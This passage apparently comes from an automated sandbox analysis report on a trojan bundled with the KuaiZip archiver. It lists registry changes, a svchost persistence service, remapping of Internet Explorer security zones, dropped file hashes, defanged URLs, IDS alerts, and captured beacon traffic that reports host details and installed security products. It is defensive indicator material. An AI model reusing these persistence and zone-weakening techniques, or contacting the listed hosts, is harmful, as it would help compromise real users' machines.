[HKCR\CLSID\{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}\VersionIndependentProgID]
"(Default)" = "QZipShell.KzShlobj"
[HKCR\Directory\shellex\ContextMenuHandlers\KuaiZipShlExt]
"(Default)" = "{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}"
[HKCR\Interface\{2DA6D0F1-13A1-4EC7-BD41-49A545AD326F}\TypeLib]
"(Default)" = "{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}"
[HKCR\*\shellex\ContextMenuHandlers\ContextMenuExt]
"(Default)" = "{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}"
[HKCR\CLSID\{C9487131-EF4C-40D9-BA70-E85356CAF67E}\TypeLib]
"(Default)" = "{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}"
[HKCR\CLSID\{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\Folder\shellex\DragDropHandlers\HardLinkShlExt]
"(Default)" = "{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}"
[HKCR\Drive\shellex\ContextMenuHandlers\KuaiZipShlExt]
"(Default)" = "{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}"
[HKCR\CLSID\{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}]
"(Default)" = "DragDropMenu Class"
[HKCR\Interface\{2DA6D0F1-13A1-4EC7-BD41-49A545AD326F}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{2FB831EA-DA68-4A66-8E31-A2D976A6296C}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\QZipShell.DragDropMenu.1]
"(Default)" = "DragDropMenu Class"
[HKCR\TypeLib\{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}\1.0]
"(Default)" = "QZipShell 1.0 Type Library"
[HKCR\CLSID\{C9487131-EF4C-40D9-BA70-E85356CAF67E}\ProgID]
"(Default)" = "QZipShell.KYDropHandler.1"
[HKCR\QZipShell.KzShlobj\CLSID]
"(Default)" = "{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}"
[HKCR\CLSID\{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}]
"(Default)" = "ContextMenuExt Class"
[HKCR\TypeLib\{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\QZipShell.DragDropMenu\CurVer]
"(Default)" = "QZipShell.DragDropMenu.1"
[HKCR\KuaiZip.kz\shellex\DropHandler]
"(Default)" = "{C9487131-EF4C-40D9-BA70-E85356CAF67E}"
[HKCR\QZipShell.DragDropMenu]
"(Default)" = "DragDropMenu Class"
[HKCR\AppID\{9CC34070-3A38-4C7A-89CB-EF8177EF07A1}]
"(Default)" = "QZipShell"
[HKCR\QZipShell.ContextMenuExt.1\CLSID]
"(Default)" = "{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}"
[HKCR\CLSID\{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}\TypeLib]
"(Default)" = "{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}"
[HKCR\CLSID\{2FB831EA-DA68-4A66-8E31-A2D976A6296C}\TypeLib]
"(Default)" = "{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}"
[HKCR\TypeLib\{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}\1.0\HELPDIR]
"(Default)" = "%Program Files%\¿ìѹ\X86"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\KzShlobj]
"(Default)" = "{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}"
[HKCR\CLSID\{C9487131-EF4C-40D9-BA70-E85356CAF67E}\InprocServer32]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZipShell.dll"
[HKCR\QZipShell.PropertyExt.1\CLSID]
"(Default)" = "{2FB831EA-DA68-4A66-8E31-A2D976A6296C}"
[HKCR\TypeLib\{86C4C3BA-4EA4-4CF8-98B9-6B07B477B835}\1.0\0\win32]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZipShell.dll"
[HKCR\QZipShell.ContextMenuExt\CLSID]
"(Default)" = "{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}"
[HKCR\QZipShell.ContextMenuExt\CurVer]
"(Default)" = "QZipShell.ContextMenuExt.1"
[HKCR\CLSID\{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}\InprocServer32]
"(Default)" = "%Program Files%\¿ìѹ\X86\KZipShell.dll"
[HKCR\QZipShell.KYDropHandler\CLSID]
"(Default)" = "{C9487131-EF4C-40D9-BA70-E85356CAF67E}"
[HKCR\CLSID\{C9487131-EF4C-40D9-BA70-E85356CAF67E}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\CLSID\{C9487131-EF4C-40D9-BA70-E85356CAF67E}]
"(Default)" = "KYDropHandler Class"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 6E AC 54 6F 36 AE D4 E7 53 A0 8E 17 48 C7 E8"
[HKCR\QZipShell.KzShlobj.1]
"(Default)" = "KzShlobj Class"
[HKCR\QZipShell.KYDropHandler.1]
"(Default)" = "KYDropHandler Class"
[HKCR\Directory\shellex\DragDropHandlers\HardLinkShlExt]
"(Default)" = "{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}"
[HKCR\CLSID\{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}\VersionIndependentProgID]
"(Default)" = "QZipShell.ContextMenuExt"
[HKCR\CLSID\{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}\VersionIndependentProgID]
"(Default)" = "QZipShell.DragDropMenu"
[HKCR\Drive\shellex\DragDropHandlers\HardLinkShlExt]
"(Default)" = "{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}"
[HKCR\QZipShell.KzShlobj.1\CLSID]
"(Default)" = "{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}"
[HKCR\CLSID\{3DCCD550-7586-40D2-A51D-D2F98EC06B3C}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\Interface\{2DA6D0F1-13A1-4EC7-BD41-49A545AD326F}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\QZipShell.KzShlobj\CurVer]
"(Default)" = "QZipShell.KzShlobj.1"
[HKCR\CLSID\{2FB831EA-DA68-4A66-8E31-A2D976A6296C}\VersionIndependentProgID]
"(Default)" = "QZipShell.PropertyExt"
[HKCR\QZipShell.KzShlobj]
"(Default)" = "KzShlobj Class"
[HKCR\Interface\{2DA6D0F1-13A1-4EC7-BD41-49A545AD326F}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\QZipShell.PropertyExt.1]
"(Default)" = "PropertyExt Class"
[HKCR\QZipShell.PropertyExt\CurVer]
"(Default)" = "QZipShell.PropertyExt.1"
[HKCR\QZipShell.PropertyExt]
"(Default)" = "PropertyExt Class"
[HKCR\*\shellex\ContextMenuHandlers\KuaiZipShlExt]
"(Default)" = "{6ADF19E3-77A3-4395-ADB4-9FD7D351EB3E}"
[HKCR\AppID\QZipShell.DLL]
"AppID" = "{9CC34070-3A38-4C7A-89CB-EF8177EF07A1}"
[HKCR\CLSID\{2FB831EA-DA68-4A66-8E31-A2D976A6296C}]
"(Default)" = "PropertyExt Class"
The process regsvr32.exe:1460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6C 14 80 CD C9 2C 64 09 63 51 5B 6C 8E 64 51 22"
[HKLM\System\CurrentControlSet\Services\KuaizipUpdateChecker]
"Description" = "快压软件升级检查服务"
[HKLM\System\CurrentControlSet\Services\KuaizipUpdateChecker\Parameters]
"ServiceDll" = "%Program Files%\¿ìѹ\X86\kuaizipUpdateChecker.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"kuaizipupdatesvc" = "KuaizipUpdateChecker"
The process 2345pic_k1252705.exe:1360 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB B7 7A 31 C2 C9 85 4E 6A 3C 6C 2F E7 7B 5F EC"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process LockPage.exe:1212 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\ComputerName]
"Path" = "%Program Files%\Common Files\System\safe.dat"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion]
"DomainVer" = "1.0.0.2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion]
"IdVer" = "1.0.0.1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion]
"MD5Ver" = "1.0.1.12"
[HKCR\CLSID\{8D6E9E7B-57C4-4080-AAAE-5DC03C45B9D8}\InProcServer32]
"(Default)" = "..\Program Files\Common Files\System\antivirus.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion]
"Lock" = "1"
[HKCR\CLSID\{8D6E9E7B-57C4-4080-AAAE-5DC03C45B9D7}\InProcServer32]
"(Default)" = "..\Program Files\Common Files\System\safemonn32.dll"
[HKCU\Software\Classes]
"SetupTime" = "2016-04-11"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\0OverlayIcon]
"(Default)" = "{8D6E9E7B-57C4-4080-AAAE-5DC03C45B9D7}"
[HKCU\Software\Classes]
"Update" = "1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 42 F8 53 BE A7 20 84 84 DF 12 85 37 6F 91 B6"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\offlinne files]
"(Default)" = "{8D6E9E7B-57C4-4080-AAAE-5DC03C45B9D8}"
[HKCU\Software\Microsoft\Windows\CurrentVersion]
"GlobalVer" = "1.0.1.12"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\c:]
"unit.bat" = "unit"
[HKCU\Software\Microsoft\Windows\CurrentVersion]
"SetupTime" = "2016-04-11"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The process at.exe:1788 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 58 FA C4 9A 6F B7 3B F3 AC EF 30 EA E9 8B 3A"
The process at.exe:496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5B 17 4E 1C DD 56 1E BC FE E0 84 9E EA 52 7E 36"
Dropped PE files
| MD5 | File path |
|---|---|
| 8cbebe8bf2dc8f62d8e0f1bdc61fe6e4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nss3.tmp\FileInfo.dll |
| 6508d7353ceb0a5e1ce3f6d547f9d8e6 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nss3.tmp\RCWidgetPlugin.dll |
| b22e97f113fa16668c8443e3115c6fc6 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nss3.tmp\System.dll |
| 18c05429ac641190c246473ddf1bbd98 | c:\Program Files\¿ìѹ\X86\7z.dll |
| 3a2c737509d27c1d68313dd371dc7aa7 | c:\Program Files\¿ìѹ\X86\DiskOpt.exe |
| d03441593e39f82cd4532caecd4e3aa8 | c:\Program Files\¿ìѹ\X86\DuiLib.dll |
| 90fbba2edef9215952664833f8e60160 | c:\Program Files\¿ìѹ\X86\KZFormat.dll |
| 6fc083cc0ca7c9a809ea54ad75d34643 | c:\Program Files\¿ìѹ\X86\KZModule.dll |
| 925b6df2e1ebb147af8a348a43cacf0b | c:\Program Files\¿ìѹ\X86\KZMount2.exe |
| d0984f95f7552d8cb19b61a8899471cb | c:\Program Files\¿ìѹ\X86\KZReport.exe |
| 286683cf098ffddd4d5dd681eca789ec | c:\Program Files\¿ìѹ\X86\KZTui.exe |
| ad0d12355799b3ba1396fce3aaaa073c | c:\Program Files\¿ìѹ\X86\KZipShell.dll |
| 3aed1d9d2b71dd0ef5e9b312ea68d187 | c:\Program Files\¿ìѹ\X86\KuaiZip.exe |
| fbb06f389086afd3b8c6bb52ad500464 | c:\Program Files\¿ìѹ\X86\KuaiZipDrive.sys |
| 21a7617bd3978b25776956b68a07b0e4 | c:\Program Files\¿ìѹ\X86\Mount.dll |
| db5da45cd4c1355796ea95fc05acbf74 | c:\Program Files\¿ìѹ\X86\MountCore.dll |
| 4354872f987aec55d65402c74d706829 | c:\Program Files\¿ìѹ\X86\SetupHelper.exe |
| 36cf7a80f981890605d6160caf18b625 | c:\Program Files\¿ìѹ\X86\Uninst.exe |
| bd027eccff948b726f7b510deed05194 | c:\Program Files\¿ìѹ\X86\Update.exe |
| 90fefe0f5ca65c6dc6e7fc159427bb93 | c:\Program Files\¿ìѹ\X86\UpdateChecker.exe |
| 1f0bce792b0bf938c845cf2d6fc426e9 | c:\Program Files\¿ìѹ\X86\finderlib.dll |
| 575b3ea8ac2d1cca03c4a13cb82aa7a5 | c:\Program Files\¿ìѹ\X86\kuaizipUpdateChecker.dll |
| 5436222ab1bd8b283a2b739dbf490258 | c:\Program Files\¿ìѹ\X86\lang\Chs_Lang.dll |
| 1c915f9fbfe082f23aac2d9b56f34047 | c:\Program Files\¿ìѹ\X86\reportframework.dll |
| 3c86bc87a9e65d5fbc05410816a78d80 | c:\Program Files\¿ìѹ\X86\sfx\kzSetup_chs.sfx |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: tongkangzhao
Product Name: chunfeidi
Product Version: 7.6.3.2
Legal Copyright: tongkangzhao ????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 7.6.3.2
File Description: zhaopingnangdc
Comments: ciaozhao
Language: Chinese (Simplified, PRC)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| UPX0 | 4096 | 872448 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| UPX1 | 876544 | 442368 | 441344 | 5.4993 | abe4466df29b7dee3ac4e2782b4b159b |
| .rsrc | 1318912 | 32768 | 31744 | 3.18519 | 1d0c735ae770ae47fa8b7888852e991d |
URLs
| URL | IP |
|---|---|
| hxxp://n4cswhk3.gccdn.net/large/6da25678gw1f1l8knvnatj20c80gbu12.jpg | |
| hxxp://n4cswhk3.gccdn.net/large/6da25678gw1f1la7wjwlnj20c80gbnpj.jpg | |
| hxxp://n4cswhk3.gccdn.net/large/6da25678gw1f1l5qvobehj20c80gbnpk.jpg | |
| hxxp://180.149.135.224/RGHZx7C | |
| hxxp://n4cswhk3.gccdn.net/large/6da25678gw1f1l8xa7bhsj20c80gbu12.jpg | |
| hxxp://opt.ecoma.ourwebpic.com/n/report/report.txt | |
| hxxp://tj.kpzip.com/kuaizipreport/stat?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlJbnN0YWxsLmV4ZQlLdWFpWmlwCTIuOC4xNC4yCTAwMDAwMDAwMDAwMDAwMDAwMDAxCTBGRUJGQkZGMDAwMDA2RkIJMDAtMEMtMjktM0YtQzktMzAJTWljcm9zb2Z0IFdpbmRvd3MgWFAJaW5zdGFsbF9ydW4= | |
| hxxp://tj.kpzip.com/kuaizipreport/active?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlLdWFpWmlwLmV4ZQlLdWFpWmlwCTIuOC4xNC4yCTAwMDAwMDAwMDAwMDAwMDAwMDAxCTBGRUJGQkZGMDAwMDA2RkIJMDAtMEMtMjktM0YtQzktMzAJTWljcm9zb2Z0IFdpbmRvd3MgWFAJRTQyODMyMTg3NTVCQzM3RTVDQTg4ODc1RjkxQkUzNzM= | |
| hxxp://tj.kpzip.com/kuaizipreport/stat?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlJbnN0YWxsLmV4ZQlLdWFpWmlwCTIuOC4xNC4yCTAwMDAwMDAwMDAwMDAwMDAwMDAxCTBGRUJGQkZGMDAwMDA2RkIJMDAtMEMtMjktM0YtQzktMzAJTWljcm9zb2Z0IFdpbmRvd3MgWFAJaW5zdGFsbF9kb25l | |
| hxxp://stat.kpzip.com/stat/index.php?pcid=630eda2537585b8645a6e7879b8a0d8b&app=kuaizip&ver=2.8.14.2&channel=union123_0088&category=KuaiZip.exe&act=app_open&p1=&p2=&key=2f5e2aa5d66794c2de4340db01f67516 | |
| hxxp://z.gds.cnzz.com/stat.htm?id=1256550373 | |
| hxxp://tj.kpzip.com/kuaizipreport/install?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlLWlJlcG9ydC5leGUJS3VhaVppcAkyLjguMTQuMgkwMDAwMDAwMDAwMDAwMDAwMDAwMQkwRkVCRkJGRjAwMDAwNkZCCTAwLTBDLTI5LTNGLUM5LTMwCU1pY3Jvc29mdCBXaW5kb3dzIFhQCTEJMAlFNDI4MzIxODc1NUJDMzdFNUNBODg4NzVGOTFCRTM3MwkxCUt1YWlaaXBfU2V0dXBfdW5pb24xMjNfMDA4OC5leGUJL0ppbmdNbw== | |
| hxxp://tj.kpzip.com/kuaizipreport/online?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlLWlJlcG9ydC5leGUJS3VhaVppcAkyLjguMTQuMgkwMDAwMDAwMDAwMDAwMDAwMDAwMQkwRkVCRkJGRjAwMDAwNkZCCTAwLTBDLTI5LTNGLUM5LTMwCU1pY3Jvc29mdCBXaW5kb3dzIFhQCUU0MjgzMjE4NzU1QkMzN0U1Q0E4ODg3NUY5MUJFMzczCSgwPVhQMywxPWFkbSwyPTE0NjAzOTcyNzMsMTQ2MDM5NzI5NiwxNDYwMzk3MzAwKQ== | |
| hxxp://opt.ecoma.ourwebpic.com/n/report/queryinfo.xml | |
| hxxp://tj.kpzip.com/kuaizipreport/jingpin?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlLWlJlcG9ydC5leGUJS3VhaVppcAkyLjguMTQuMgkwMDAwMDAwMDAwMDAwMDAwMDAwMQkwRkVCRkJGRjAwMDAwNkZCCTAwLTBDLTI5LTNGLUM5LTMwCU1pY3Jvc29mdCBXaW5kb3dzIFhQCTIzNDVoYW96aXAtMDAwfDM2MHppcC0wMDB8N3otMDAwfFdpblJBUi0wMDB8MzYwQVFXUy0wMDA= | |
| hxxp://tj.kpzip.com/kuaizipreport/jingpin?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlLWlJlcG9ydC5leGUJS3VhaVppcAkyLjguMTQuMgkwMDAwMDAwMDAwMDAwMDAwMDAwMQkwRkVCRkJGRjAwMDAwNkZCCTAwLTBDLTI5LTNGLUM5LTMwCU1pY3Jvc29mdCBXaW5kb3dzIFhQCVFRR0otMDAwfEpTREItMDAwfEJEV1MtMDAwfFJYU0QtMDAwfE5vcnRvbi0wMDA= | |
| hxxp://opt.ecoma.ourwebpic.com/n/report/shortcut.xml | |
| hxxp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/bjzy3?public&code=bdda3f78ed99e24e0f6f6913dc30f240 | |
| hxxp://z13.cnzz.com/stat.htm?id=1256550373 | |
| hxxp://ww3.sinaimg.cn/large/6da25678gw1f1l8xa7bhsj20c80gbu12.jpg | |
| hxxp://ww1.sinaimg.cn/large/6da25678gw1f1la7wjwlnj20c80gbnpj.jpg | |
| hxxp://ww3.sinaimg.cn/large/6da25678gw1f1l8knvnatj20c80gbu12.jpg | |
| hxxp://ww4.sinaimg.cn/large/6da25678gw1f1l5qvobehj20c80gbnpk.jpg | |
| hxxp://i.kpzip.com/n/report/queryinfo.xml | |
| hxxp://i.kpzip.com/n/report/report.txt | |
| hxxp://i.kpzip.com/n/report/shortcut.xml | |
| hxxp://t.cn/RGHZx7C | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
SURICATA STREAM ESTABLISHED packet out of window
SURICATA STREAM Packet with invalid ack
SURICATA STREAM ESTABLISHED invalid ack
SURICATA STREAM FIN out of window
SURICATA STREAM SHUTDOWN RST invalid ack
Traffic
GET /stat.htm?id=1256550373 HTTP/1.1
Referer: hXXp://z13.cnzz.com/stat.htm?id=1256550373
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Content-Type: application/x-www-form-urlencoded
Host: z13.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine
Date: Mon, 11 Apr 2016 17:53:13 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Thu, 16 Apr 2015 02:22:34 GMT
Connection: close
Accept-Ranges: bytes
GIF89a.............!.......,...........D..;..
GET /RGHZx7C HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: t.cn
Connection: Keep-Alive
HTTP/1.1 302 Found
Location: hXXp://ww3.sinaimg.cn/large/6da25678gw1f1l8xa7bhsj20c80gbu12.jpg
Content-Type: text/html;charset=UTF-8
Server: weibo
Content-Length: 246
Date: Mon, 11 Apr 2016 17:52:41 GMT
X-Varnish: 786126080
Age: 0
Via: 1.1 varnish
Connection: keep-alive
<HTML>.<HEAD>.<TITLE>Moved Temporarily</TITLE>.</HEAD>.<BODY BGCOLOR="#FFFFFF" TEXT="#000000">.<H1>Moved Temporarily</H1>.The document has moved <A HREF="hXXp://ww3.sinaimg.cn/large/6da25678gw1f1l8xa7bhsj20c80gbu12.jpg">here</A>..</BODY>.</HTML>.
GET /n/report/shortcut.xml HTTP/1.1
Host: i.kpzip.com
Accept: */*
HTTP/1.1 200 OK
Expires: Tue, 12 Apr 2016 03:18:21 GMT
Date: Mon, 11 Apr 2016 03:18:21 GMT
Server: nginx/1.4.1
Content-Type: text/xml
Content-Length: 253
Last-Modified: Thu, 18 Feb 2016 02:56:13 GMT
ETag: "56c532cd-fd"
Cache-Control: max-age=86400
Accept-Ranges: bytes
Age: 1
X-Via: 1.1 fuzhou185:8080 (Cdn Cache Server V2.0), 1.1 db77:4 (Cdn Cache Server V2.0)
Connection: keep-alive
<?xml version="1.0" encoding="UTF-8"?>..<shortcut>. <simplerule type="url" name=".......url"/>. <simplerule type="url" name="..........url"/>. <simplerule type="url" name=".......url"/>. <simplerule type="url" name=".......url"/>.</shortcut>..
POST /kuaizipreport/jingpin?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlLWlJlcG9ydC5leGUJS3VhaVppcAkyLjguMTQuMgkwMDAwMDAwMDAwMDAwMDAwMDAwMQkwRkVCRkJGRjAwMDAwNkZCCTAwLTBDLTI5LTNGLUM5LTMwCU1pY3Jvc29mdCBXaW5kb3dzIFhQCVFRR0otMDAwfEpTREItMDAwfEJEV1MtMDAwfFJYU0QtMDAwfE5vcnRvbi0wMDA= HTTP/1.1
Host: tj.kpzip.com
Accept: */*
Content-Length: 0
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Transfer-Encoding: chunked
Date: Mon, 11 Apr 2016 17:52:24 GMT
c..{"status":1}..0..
GET /n/report/report.txt HTTP/1.1
Host: i.kpzip.com
User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36
Accept:*/*
HTTP/1.1 200 OK
Expires: Tue, 12 Apr 2016 14:44:02 GMT
Date: Mon, 11 Apr 2016 14:44:02 GMT
Server: nginx/1.4.1
Content-Type: text/plain
Content-Length: 131
Last-Modified: Tue, 22 Mar 2016 03:04:47 GMT
ETag: "56f0b64f-83"
Cache-Control: max-age=86400
Accept-Ranges: bytes
Age: 1
X-Via: 1.1 db78:9 (Cdn Cache Server V2.0)
Connection: keep-alive
[config].URL=hXXp://tj.kpzip.com..[DefaultOpenSoft-].Compress=HKEY_CLASS_ROOT\.zip.Browser=HKEY_CLASS_ROOT\http\shell\open\command...
GET /n/report/queryinfo.xml HTTP/1.1
Host: i.kpzip.com
Accept: */*
HTTP/1.1 200 OK
Expires: Tue, 12 Apr 2016 02:44:13 GMT
Date: Mon, 11 Apr 2016 02:44:13 GMT
Server: nginx/1.4.1
Content-Type: text/xml
Content-Length: 2845
Last-Modified: Thu, 18 Feb 2016 02:56:13 GMT
ETag: "56c532cd-b1d"
Cache-Control: max-age=86400
Accept-Ranges: bytes
Age: 1
X-Via: 1.1 db78:1 (Cdn Cache Server V2.0)
Connection: keep-alive
...<?xml version="1.0" encoding="utf-8"?>..<TheQueryInfo>...<QueryProbability value="1000/1000"></QueryProbability>...<QueryList>....<QueryItem>.....<QueryName>2345haozip</QueryName>.....<HKeyLocalMachineUninstallDisplayName>2345......</HKeyLocalMachineUninstallDisplayName>....</QueryItem>....<QueryItem>.....<QueryName>360zip</QueryName>.....<HKeyLocalMachineUninstallDisplayName>360......</HKeyLocalMachineUninstallDisplayName>....</QueryItem>....<QueryItem>.....<QueryName>7z</QueryName>.....<HKeyLocalMachineUninstallDisplayName>7-Zip</HKeyLocalMachineUninstallDisplayName>....</QueryItem>....<QueryItem>.....<QueryName>WinRAR</QueryName>.....<HKeyLocalMachineUninstallDisplayName>WinRAR</HKeyLocalMachineUninstallDisplayName>....</QueryItem>....<QueryItem>.....<QueryName>360AQWS</QueryName>.....<HKeyLocalMachineUninstallDisplayName>360............</HKeyLocalMachineUninstallDisplayName>.....<HKeyLocalMachineServicesDisplayName>............</HKeyLocalMachineServicesDisplayName>.....<HKeyLocalMachineServicesChildKeyName>ZhuDongFangYu</HKeyLocalMachineServicesChildKeyName>....</QueryItem>....<QueryItem>.....<QueryName>QQGJ</QueryName>.....<HKeyLocalMachineUninstallDisplayName>............</HKeyLocalMachineUninstallDisplayName>.....<HKeyLocalMachineServicesD
<<< skipped >>>
POST /kuaizipreport/stat?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlJbnN0YWxsLmV4ZQlLdWFpWmlwCTIuOC4xNC4yCTAwMDAwMDAwMDAwMDAwMDAwMDAxCTBGRUJGQkZGMDAwMDA2RkIJMDAtMEMtMjktM0YtQzktMzAJTWljcm9zb2Z0IFdpbmRvd3MgWFAJaW5zdGFsbF9kb25l HTTP/1.1
Host: tj.kpzip.com
Accept: */*
Content-Length: 0
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Transfer-Encoding: chunked
Date: Mon, 11 Apr 2016 17:52:13 GMT
c..{"status":1}..0..
GET /fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/bjzy3?public&code=bdda3f78ed99e24e0f6f6913dc30f240 HTTP/1.1
